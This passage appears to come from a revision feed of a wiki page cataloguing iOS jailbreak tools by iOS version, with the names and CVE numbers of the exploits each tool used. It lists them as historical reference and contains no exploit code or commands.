=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Home Depot]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
=== [[JailbreakMe 4.0]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Phœnix]] (9.3.5 / 9.3.6) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* mach_port_register Kernel exploit ({{cve|2016-4669}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 10.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===&lt;br /&gt;
&lt;br /&gt;
* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})&lt;br /&gt;
&lt;br /&gt;
=== [[yalu102]] (10.0.1-10.2) ===&lt;br /&gt;
&lt;br /&gt;
* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})&lt;br /&gt;
&lt;br /&gt;
=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[Meridian]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})&lt;br /&gt;
&lt;br /&gt;
=== [[H3lix]] (10.0.1 - 10.3.4) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 11.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2 &lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
===[[Electra]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* v1ntex ({{cve|2019-6225}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 12.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Chimera]] (12.0 - 12.2 / 12.4)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* sockpuppet ({{cve|2019-8527}})&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* sockpuppet ({{cve|2019-8527}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (12.3 - 12.4.7)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 13.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (13.0 - 13.5)===&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* tachy0n (lightspeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (13.0 - 13.5)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=103085</id>
		<title>Jailbreak Exploits</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=103085"/>
		<updated>2020-06-01T23:50:35Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Unc0ver (13.0 - 13.5) */  Added tachy0n exploit.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page lists the '''exploits''' used in [[jailbreak]]s.&lt;br /&gt;
&lt;br /&gt;
== Common exploits ==&lt;br /&gt;
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.&lt;br /&gt;
&lt;br /&gt;
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])&lt;br /&gt;
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)&lt;br /&gt;
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])&lt;br /&gt;
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as &amp;quot;steaks4uce&amp;quot;) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
&lt;br /&gt;
== Jailbreak Programs ==&lt;br /&gt;
=== [[PwnageTool]] (2.0 - 5.1.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[redsn0w]] (3.0 - 6.0) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 6.1.2&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 1.x ==&lt;br /&gt;
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===&lt;br /&gt;
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})&lt;br /&gt;
&lt;br /&gt;
=== [[mknod|OktoPrep]] (1.1.2) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.2 from a jailbroken 1.1.1&lt;br /&gt;
* [[mknod]]&lt;br /&gt;
&lt;br /&gt;
=== [[Soft Upgrade]] (1.1.3) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.3 from a running jailbroken 1.1.2&lt;br /&gt;
&lt;br /&gt;
=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
* [[Ramdisk Hack]]&lt;br /&gt;
&lt;br /&gt;
=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 2.x ==&lt;br /&gt;
=== [[QuickPwn]] (2.0 - 2.2.1) ===&lt;br /&gt;
* uses [[Pwnage]] and [[Pwnage 2.0]]&lt;br /&gt;
&lt;br /&gt;
=== [[Redsn0w Lite]] (2.1.1) ===&lt;br /&gt;
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 3.x ==&lt;br /&gt;
=== [[purplera1n]] (3.0) ===&lt;br /&gt;
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===&lt;br /&gt;
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===&lt;br /&gt;
* [[MobileBackup Copy Exploit]]&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[BPF_STX Kernel Write Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 4.x ==&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})&lt;br /&gt;
&lt;br /&gt;
=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3&lt;br /&gt;
* [[ndrv_setspec() Integer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.3 - 4.3.5) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 5.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]])  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Corona|Corona Untether]] (5.0.1)  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (5.0-5.1.1) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 6.x ==&lt;br /&gt;
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2)  ===&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
* [[Shebang Trick]] ({{cve|2013-5154}})&lt;br /&gt;
* [[AMFID code signing evasion]]&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})&lt;br /&gt;
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})&lt;br /&gt;
* [[dynamic memmove() locating]]&lt;br /&gt;
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]&lt;br /&gt;
* [[kernel memory write via ROP gadget]]&lt;br /&gt;
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})&lt;br /&gt;
&lt;br /&gt;
=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===&lt;br /&gt;
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]])&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 7.x ==&lt;br /&gt;
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===&lt;br /&gt;
{{Section Stub}}&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})&lt;br /&gt;
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})&lt;br /&gt;
&lt;br /&gt;
=== [[Geeksn0w]] (7.1 / 7.1.1) ===&lt;br /&gt;
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)&lt;br /&gt;
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu &amp;gt;v1.0.0)&lt;br /&gt;
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})&lt;br /&gt;
* &amp;quot;syslogd chown&amp;quot; vulnerability&lt;br /&gt;
* enterprise certificate (no real exploit, used for initial &amp;quot;unsigned&amp;quot; code execution)&lt;br /&gt;
* &amp;quot;foo_extracted&amp;quot; symlink vulnerability (used to write to /var) ({{cve|2014-4386}})&lt;br /&gt;
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)&lt;br /&gt;
* VoIP backgrounding trick (used to auto restart the app)&lt;br /&gt;
* hidden segment attack&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 8.x ==&lt;br /&gt;
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===&lt;br /&gt;
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)&lt;br /&gt;
* enterprise certificate (inside the IPA)&lt;br /&gt;
* a kind of dylib injection into a system process (see IPA)&lt;br /&gt;
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)&lt;br /&gt;
* a sandboxing problem in debugserver ({{cve|2014-4457}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)&lt;br /&gt;
* enable-dylibs-to-override-cache&lt;br /&gt;
* a new ovelapping segment attack ({{cve|2014-4455}})&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===&lt;br /&gt;
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])&lt;br /&gt;
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache&lt;br /&gt;
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load&lt;br /&gt;
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)&lt;br /&gt;
* MobileStorageMounter exploit ({{cve|2015-1062}})&lt;br /&gt;
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})&lt;br /&gt;
&lt;br /&gt;
Kernel:&lt;br /&gt;
&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===&lt;br /&gt;
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)&lt;br /&gt;
* Symbolic linking to AFC ({{cve|2015-5746}})&lt;br /&gt;
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3802}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3803}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3805}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3806}})&lt;br /&gt;
* IOHIDFamily exploit ({{cve|2015-5774}})&lt;br /&gt;
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})&lt;br /&gt;
&lt;br /&gt;
=== [[EtasonJB]] and [[Home Depot]] (8.4.1) === &lt;br /&gt;
&lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 9.x ==&lt;br /&gt;
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===&lt;br /&gt;
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})&lt;br /&gt;
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables.  ({{cve|2015-7051}})&lt;br /&gt;
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})&lt;br /&gt;
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})&lt;br /&gt;
* Racing KPP for some of the patches.&lt;br /&gt;
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})&lt;br /&gt;
&lt;br /&gt;
=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Home Depot]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
=== [[JailbreakMe 4.0]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Phœnix]] (9.3.5 / 9.3.6) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* mach_port_register Kernel exploit ({{cve|2016-4669}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 10.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===&lt;br /&gt;
&lt;br /&gt;
* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})&lt;br /&gt;
&lt;br /&gt;
=== [[yalu102]] (10.0.1-10.2) ===&lt;br /&gt;
&lt;br /&gt;
* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})&lt;br /&gt;
&lt;br /&gt;
=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[Meridian]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})&lt;br /&gt;
&lt;br /&gt;
=== [[H3lix]] (10.0.1 - 10.3.4) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 11.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2 &lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
===[[Electra]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* v1ntex ({{cve|2019-6225}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 12.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Chimera]] (12.0 - 12.2 / 12.4)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* sockpuppet ({{cve|2019-8527}})&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* sockpuppet ({{cve|2019-8527}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (12.3 - 12.4.7)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 13.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (13.0 - 13.5)===&lt;br /&gt;
&lt;br /&gt;
